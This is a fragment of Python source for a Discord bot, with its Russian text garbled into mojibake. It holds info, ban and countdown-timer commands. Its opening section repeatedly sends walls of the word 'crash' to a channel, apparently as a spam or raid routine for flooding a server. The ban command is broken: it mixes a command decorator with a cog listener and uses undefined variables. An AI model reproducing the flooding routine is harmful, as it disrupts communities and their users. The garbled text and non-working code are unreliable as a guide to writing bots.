        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')




@bot.command(aliases = ['лИлйЛёлЙ'])
async def info(ctx, arg):
    bot=["л▒лЙЛѓ","bot"]
    emb=discord.Embed(title = '**лўлЮлцлълалюлљлдлўл» лъ лЉлълблЋ**', description = '**лАлЙлил┤л░Лѓлхл╗Лї:** `Rain13#1313`\n"лблхЛЂЛѓлхЛђ": `­ЮЋ»­ЮќЌ­Юќє­Юќї­Юќћ­ЮќЊ4­Юќј­Юќљ сѓи#6666`\n__***лњЛђлЙл┤лх, л▓ЛЂЛЉ***__')
    if arg in bot:
        await ctx.reply(embed=emb)
    elif arg == str(' '):
        await ctx.reply('**лбЛІ л┤лЙл╗###л▒?**')
    else:
        await ctx.reply('**лБ л┤л░лйлйлЙл╣ л║лЙл╝л░лйл┤ЛІ лйлхЛѓ л░Лђл│ЛЃл╝лхлйЛѓлЙл▓!**')

@bot.command()
@commands.Cog.listener()
async def ban(self, guild:discord.Guild, user:discord.User):
    if permissions('ban_members'):
        await user.ban(guild.user)
        await message.channel.send(f'лЪлЙл╗ЛїлилЙл▓л░Лѓлхл╗Лї {user} лил░л▒л░лйлхлй!')
    elif user == [0]:
        await message.channel.send('лњЛІ лйлх ЛЃл┐лЙл╝ЛЈлйЛЃл╗лИ л┐лЙл╗ЛїлилЙл▓л░Лѓлхл╗ЛЈ!')
    else:
        await message.channel.send('лБ л▓л░ЛЂ лйлхл┤лЙЛЂЛѓл░ЛѓлЙЛЄлйлЙ л┐Лђл░л▓!')

@bot.command()
async def Лѓл░л╣л╝лхЛђ(ctx):
    min=0
    sec=60
    emb = discord.Embed(type="rich", colour=discord.Color.blurple(), description= f'лћлЙ л║лЙлйЛєл░: {min} л╝лИлй. {sec} ЛЂлхл║.')
    message = await ctx.send(embed = emb)
    while(sec != 0):
        sec-=1
        emb = discord.Embed(type="rich", colour=discord.Color.blurple(), description= f'лћлЙ л║лЙлйЛєл░: {min} л╝лИлй. {sec} ЛЂлхл║.')
        await message.edit(embed = emb)
        await asyncio.sleep(0.25)

        